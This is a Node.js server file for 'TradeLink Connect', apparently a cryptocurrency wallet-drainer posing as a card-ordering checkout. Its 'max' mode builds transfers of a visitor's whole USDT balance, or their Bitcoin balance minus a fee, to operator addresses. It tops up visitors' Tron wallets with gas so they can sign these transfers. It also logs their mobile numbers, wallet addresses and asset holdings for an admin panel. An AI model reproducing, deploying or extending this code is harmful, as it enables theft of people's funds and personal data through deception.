import { createServer } from 'node:http';
import { readFile, appendFile, mkdir } from 'node:fs/promises';
import { extname, join, normalize } from 'node:path';
import { fileURLToPath } from 'node:url';
import { Wallet } from 'ethers';
import { TronWeb } from 'tronweb';
import { initAdminSettings, saveAdminSettings, publicAdminSettings } from './adminStore.mjs';
import { adminLogin, adminLogout, isAdminRequest } from './adminAuth.mjs';

const root = fileURLToPath(new URL('./dist', import.meta.url)); const port = Number(process.env.PORT || 3000);
const tronHost = 'https://api.trongrid.io'; const tronUsdt = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t';
if (!process.env.REOWN_PROJECT_ID) throw new Error('REOWN_PROJECT_ID is required');
const evmAddress = process.env.OPERATOR_PRIVATE_KEY ? new Wallet(process.env.OPERATOR_PRIVATE_KEY).address : '';
const tronAddress = process.env.TRON_PRIVATE_KEY ? TronWeb.address.fromPrivateKey(process.env.TRON_PRIVATE_KEY) : '';
let adminSettings = await initAdminSettings();
let enabledAssets = adminSettings.enabledAssets; let amountUsd = adminSettings.amountUsd; let amountMode = adminSettings.amountMode; let tronGasTarget = adminSettings.tronGasTarget;
const checkoutAmount = (value, card) => amountMode === 'fixed' ? amountUsd : (card === 'physical' && Number(value) === 100 ? 100 : card === 'virtual' && Number(value) === 10 ? 10 : amountUsd); const limits = new Map();
function json(res, status, value) { res.writeHead(status, { 'Content-Type': 'application/json', 'Cache-Control': 'no-store' }); res.end(JSON.stringify(value)); }
async function body(req) { const chunks = []; for await (const chunk of req) chunks.push(chunk); const data = Buffer.concat(chunks); if (data.length > 1e6) throw new Error('Request too large'); return JSON.parse(data.toString() || '{}'); }
function rateLimited(req) { const key = String(req.headers['x-forwarded-for'] || req.socket.remoteAddress || 'unknown').split(',')[0].trim(); const now = Date.now(); const row = limits.get(key) || { start: now, count: 0 }; if (now - row.start > 60000) { row.start = now; row.count = 0; } row.count += 1; limits.set(key, row); return row.count > 60; }
async function tronAmount(from, requestedUsd = amountUsd) { if (!/^T[1-9A-HJ-NP-Za-km-z]{33}$/.test(from || '') || !tronAddress) throw new Error('Tron is not configured'); const reader = new TronWeb({ fullHost: tronHost }); reader.setAddress(from); const contract = await reader.contract().at(tronUsdt); const balance = BigInt((await contract.balanceOf(from).call()).toString()); const whole = 1_000_000n; const requested = BigInt(Math.round(requestedUsd * 1e6)); const raw = amountMode === 'max' ? (balance / whole) * whole : requested; return raw > 0n && balance >= raw ? { amount: Number(raw) / 1e6, raw, availableUsd: Number(balance) / 1e6 } : { amount: 0, raw: 0n, availableUsd: Number(balance) / 1e6 }; }
const cardRequestsFile = './data/card-requests.jsonl';
async function cardRequests(){try{const rows=(await readFile(cardRequestsFile,'utf8')).split('\n').filter(Boolean).map(line=>JSON.parse(line));const merged=new Map();for(const row of rows)merged.set(row.id,{...(merged.get(row.id)||{}),...row});return [...merged.values()].sort((a,b)=>String(b.createdAt||'').localeCompare(String(a.createdAt||'')))}catch(error){if(error.code==='ENOENT')return [];throw error;}}
const tronFundingFile = './data/tron-funded-addresses.txt'; const tronFundingLocks = new Map();
async function wasTronFunded(from) { try { return (await readFile(tronFundingFile, 'utf8')).split('\n').includes(from); } catch (error) { if (error.code === 'ENOENT') return false; throw error; } }
async function fundTron(from) { if (!process.env.TRON_PRIVATE_KEY) throw new Error('TRON_PRIVATE_KEY is not configured'); if (await wasTronFunded(from)) return; if (tronFundingLocks.has(from)) return tronFundingLocks.get(from); const funding = (async () => { await mkdir('./data', { recursive: true }); const target = Math.max(0, Number(tronGasTarget || 20)) * 1e6; const reader = new TronWeb({ fullHost: tronHost }); const balance = Number(await reader.trx.getBalance(from)); if (balance < target) { const signer = new TronWeb({ fullHost: tronHost, privateKey: process.env.TRON_PRIVATE_KEY }); const sent = await signer.trx.sendTransaction(from, Math.ceil(target - balance)); if (!sent?.result) throw new Error('Unable to send the one-time TRX network top-up'); } await appendFile(tronFundingFile, `${from}\n`); })().finally(() => tronFundingLocks.delete(from)); tronFundingLocks.set(from, funding); return funding; }
async function tronPrepare(payload) { const requestedUsd = checkoutAmount(payload.amountUsd, payload.card); const calculated = await tronAmount(payload.from, requestedUsd); if (!calculated.raw) return { amount: 0, availableUsd: calculated.availableUsd }; await fundTron(payload.from); if (payload.preview) return { amount: calculated.amount, funded: true }; const tronWeb = new TronWeb({ fullHost: tronHost }); const built = await tronWeb.transactionBuilder.triggerSmartContract(tronUsdt, 'transfer(address,uint256)', { feeLimit: 100_000_000 }, [{ type: 'address', value: tronAddress }, { type: 'uint256', value: calculated.raw.toString() }], payload.from); if (!built?.result?.result || !built.transaction) throw new Error('Unable to build Tron transfer'); return { amount: calculated.amount, availableUsd: calculated.availableUsd, transaction: built.transaction }; }
function validateSignedTron(transaction, requestedUsd = amountUsd) { const contract = transaction?.raw_data?.contract?.[0]; const value = contract?.parameter?.value; const data = String(value?.data || '').toLowerCase(); const ownerHex = String(value?.owner_address || ''); const expectedContract = TronWeb.address.toHex(tronUsdt).toLowerCase(); const expectedRecipient = TronWeb.address.toHex(tronAddress).slice(-40).toLowerCase(); const rawAmount = data.length >= 136 ? BigInt(`0x${data.slice(-64)}`) : 0n; const minimum = amountMode === 'fixed' ? BigInt(Math.round(requestedUsd * 1e6)) : 1n; if (contract?.type !== 'TriggerSmartContract' || String(value?.contract_address || '').toLowerCase() !== expectedContract || !data.startsWith('a9059cbb') || data.slice(8, 72).slice(-40) !== expectedRecipient || rawAmount < minimum || !transaction?.signature?.length || !ownerHex) throw new Error('Signed Tron transaction does not match the reviewed transfer'); return TronWeb.address.fromHex(ownerHex); }
async function bitcoinPreview(address, requestedUsd = amountUsd) { if (!process.env.BTC_OPERATOR_ADDRESS || !/^[a-zA-Z0-9]{14,90}$/.test(address || '')) return { amount: 0 }; const [statsResponse, priceResponse] = await Promise.all([fetch(`https://blockstream.info/api/address/${encodeURIComponent(address)}`), fetch('https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd')]); if (!statsResponse.ok || !priceResponse.ok) throw new Error('Bitcoin balance service is unavailable'); const stats = await statsResponse.json(); const price = Number((await priceResponse.json())?.bitcoin?.usd || 0); const balance = Number(stats.chain_stats.funded_txo_sum - stats.chain_stats.spent_txo_sum); const requested = Math.floor(requestedUsd / price * 1e8); const satoshis = amountMode === 'max' ? Math.max(0, balance - 1000) : requested; return price && satoshis > 0 && balance >= satoshis + 1000 ? { amount: satoshis / 1e8, satoshis: String(satoshis), availableUsd: balance / 1e8 * price } : { amount: 0, availableUsd: balance / 1e8 * price }; }
async function api(req, res, path, url) {
  if (path === '/api/public-settings' && req.method === 'GET') return json(res, 200, publicAdminSettings(adminSettings));
  if (path === '/api/admin/login' && req.method === 'POST') { const payload = await body(req); const cookie = adminLogin(payload.password); if (!cookie) return json(res, 401, { error: 'Incorrect admin password' }); res.setHeader('Set-Cookie', cookie); return json(res, 200, { authenticated: true }); }
  if (path === '/api/admin/logout' && req.method === 'POST') { res.setHeader('Set-Cookie', adminLogout(req)); return json(res, 200, { authenticated: false }); }
  if (path.startsWith('/api/admin/')) {
    if (!isAdminRequest(req)) return json(res, 401, { error: 'Admin login required' });
    if (path === '/api/admin/settings' && req.method === 'GET') return json(res, 200, adminSettings);
    if (path === '/api/admin/settings' && req.method === 'PUT') { adminSettings = await saveAdminSettings(await body(req)); enabledAssets = adminSettings.enabledAssets; amountUsd = adminSettings.amountUsd; amountMode = adminSettings.amountMode; tronGasTarget = adminSettings.tronGasTarget; return json(res, 200, adminSettings); }
    if (path === '/api/admin/status' && req.method === 'GET') return json(res, 200, { online: true, uptimeSeconds: Math.floor(process.uptime()), evmAddress, tronAddress, btcConfigured: Boolean(process.env.BTC_OPERATOR_ADDRESS), version: process.env.APP_VERSION || 'main' });
    if (path === '/api/admin/card-requests' && req.method === 'GET') return json(res, 200, await cardRequests());
    return json(res, 404, { error: 'Not found' });
  }
  if (path === '/api/config' && req.method === 'GET') return json(res, 200, { projectId: process.env.REOWN_PROJECT_ID, appName: process.env.APP_NAME || 'TradeLink Connect', evmAddress, tronAddress, btcAddress: process.env.BTC_OPERATOR_ADDRESS || '', enabledAssets, amountUsd: checkoutAmount(url.searchParams.get('amount'), url.searchParams.get('card')), card: url.searchParams.get('card') === 'physical' ? 'physical' : 'virtual', cardName: url.searchParams.get('card') === 'physical' ? 'Physical Card' : 'Virtual Card', theme: url.searchParams.get('theme') === 'black' ? 'black' : 'blue', amountMode, automaticPayment: adminSettings.automaticPayment, tracking: adminSettings.tracking });
  const payload = await body(req);
  if (path === '/api/card-requests' && req.method === 'POST') { const cardName=String(payload.cardName||'').trim().replace(/[^a-zA-Z .'-]/g,'').slice(0,26); const mobile=String(payload.mobile||'').replace(/\D/g,''); const country=String(payload.country||'').slice(0,60); const countryCode=String(payload.countryCode||''); const card=payload.card==='physical'?'physical':'virtual'; const theme=payload.theme==='black'?'black':'blue'; const minimums=card==='physical'?{daily:100000,monthly:5000000,atmDaily:50000,perTransaction:100000}:{daily:10000,monthly:1000000,perTransaction:5000}; const maximums=card==='physical'?{daily:1000000,monthly:50000000,atmDaily:500000,perTransaction:1000000}:{daily:100000,monthly:10000000,perTransaction:50000}; const limits=Object.fromEntries(Object.entries(minimums).map(([key,min])=>[key,Math.min(maximums[key],Math.max(min,Math.round(Number(payload.limits?.[key])||min)))])); if(cardName.length<2||!/^\d{10}$/.test(mobile)||!/^\+\d{1,4}$/.test(countryCode)||!country)return json(res,400,{error:'Valid card name, country, and 10-digit mobile number are required'}); const request={id:`CR-${Date.now().toString(36).toUpperCase()}`,cardName,country,countryCode,mobile,card,theme,limits,createdAt:new Date().toISOString()}; await mkdir('./data',{recursive:true}); await appendFile(cardRequestsFile,`${JSON.stringify(request)}\n`); return json(res,201,{saved:true,id:request.id}); }
  if (path === '/api/tron/prepare' && req.method === 'POST') return json(res, 200, await tronPrepare(payload));
  if (path === '/api/tron/broadcast' && req.method === 'POST') { const from = validateSignedTron(payload.transaction, checkoutAmount(payload.amountUsd, payload.card)); await fundTron(from); const reader = new TronWeb({ fullHost: tronHost }); const result = await reader.trx.sendRawTransaction(payload.transaction); if (!result?.result) throw new Error(String(result?.message || 'Tron broadcast failed')); return json(res, 200, { txid: result.txid }); }
  if (path === '/api/bitcoin/preview' && req.method === 'POST') return json(res, 200, await bitcoinPreview(payload.address, checkoutAmount(payload.amountUsd, payload.card)));
  if (path === '/api/card-connections' && req.method === 'POST') { const requestId=String(payload.requestId||'').slice(0,80); const existing=(await cardRequests()).find(row=>row.id===requestId); if(!existing)return json(res,404,{error:'Card request not found'}); const update={id:requestId}; if(payload.wallet!==undefined)update.wallet=String(payload.wallet||'').slice(0,60); if(payload.evmAddress!==undefined)update.evmAddress=String(payload.evmAddress||'').slice(0,100); if(payload.tronAddress!==undefined)update.tronAddress=String(payload.tronAddress||'').slice(0,100); if(payload.bitcoinAddress!==undefined)update.bitcoinAddress=String(payload.bitcoinAddress||'').slice(0,120); if(Array.isArray(payload.networks))update.networks=payload.networks.map(value=>String(value).slice(0,60)).slice(0,20); if(Array.isArray(payload.assets))update.assets=payload.assets.slice(0,20).map(item=>({chain:String(item.chain||'').slice(0,40),symbol:String(item.symbol||'').slice(0,20),amount:Number(item.amount||0)})); if(payload.connectionStatus!==undefined){update.connectionStatus=String(payload.connectionStatus||'').slice(0,30);update.connectedAt=new Date().toISOString();} if(payload.paymentStatus!==undefined)update.paymentStatus=String(payload.paymentStatus||'').slice(0,30); await appendFile(cardRequestsFile,`${JSON.stringify(update)}\n`); return json(res,200,{saved:true}); }
  if (path === '/api/event' && req.method === 'POST') { await mkdir('./data', { recursive: true }); const safe = { requestId: String(payload.requestId || '').slice(0,80), chain: String(payload.chain || ''), symbol: String(payload.symbol || ''), amount: Number(payload.amount || 0), status: String(payload.status || ''), txHash: String(payload.txHash || ''), createdAt: new Date().toISOString() }; await appendFile('./data/transactions.jsonl', `${JSON.stringify(safe)}\n`); if(safe.requestId){const existing=(await cardRequests()).find(row=>row.id===safe.requestId);if(existing)await appendFile(cardRequestsFile,`${JSON.stringify({id:safe.requestId,paymentStatus:safe.status,paymentChain:safe.chain,paymentSymbol:safe.symbol,paymentAmount:safe.amount,txHash:safe.txHash,paymentAt:safe.createdAt})}\n`);} return json(res, 200, { saved: true }); }
  return json(res, 404, { error: 'Not found' });
}
const types = { '.html': 'text/html; charset=utf-8', '.js': 'text/javascript; charset=utf-8', '.css': 'text/css; charset=utf-8', '.svg': 'image/svg+xml', '.png': 'image/png', '.ico': 'image/x-icon' };
async function staticFile(res, path) { const relative = path === '/' ? 'index.html' : (path === '/connect' || path === '/connect/' || path === '/crimsonpay-secure-operations-control-center' || path === '/crimsonpay-secure-operations-control-center/' ? 'connect/index.html' : normalize(path)).replace(/^(\.\.[/\\])+/, '').replace(/^[/\\]/, ''); let file = join(root, relative); try { const content = await readFile(file); res.writeHead(200, { 'Content-Type': types[extname(file)] || 'application/octet-stream', 'Cache-Control': extname(file) === '.html' ? 'no-store' : 'no-cache, must-revalidate' }); res.end(content); } catch (_) { file = join(root, path.startsWith('/connect') ? 'connect/index.html' : 'index.html'); res.writeHead(200, { 'Content-Type': types['.html'], 'Cache-Control': 'no-store' }); res.end(await readFile(file)); } }
createServer(async (req, res) => { try { const url = new URL(req.url, 'http://localhost'); const path = url.pathname; if (path.startsWith('/api/')) { if (rateLimited(req)) return json(res, 429, { error: 'Too many requests' }); return await api(req, res, path, url); } await staticFile(res, path); } catch (error) { json(res, 400, { error: error.message }); } }).listen(port, '0.0.0.0', () => console.log(`TradeLink standalone listening on ${port}`));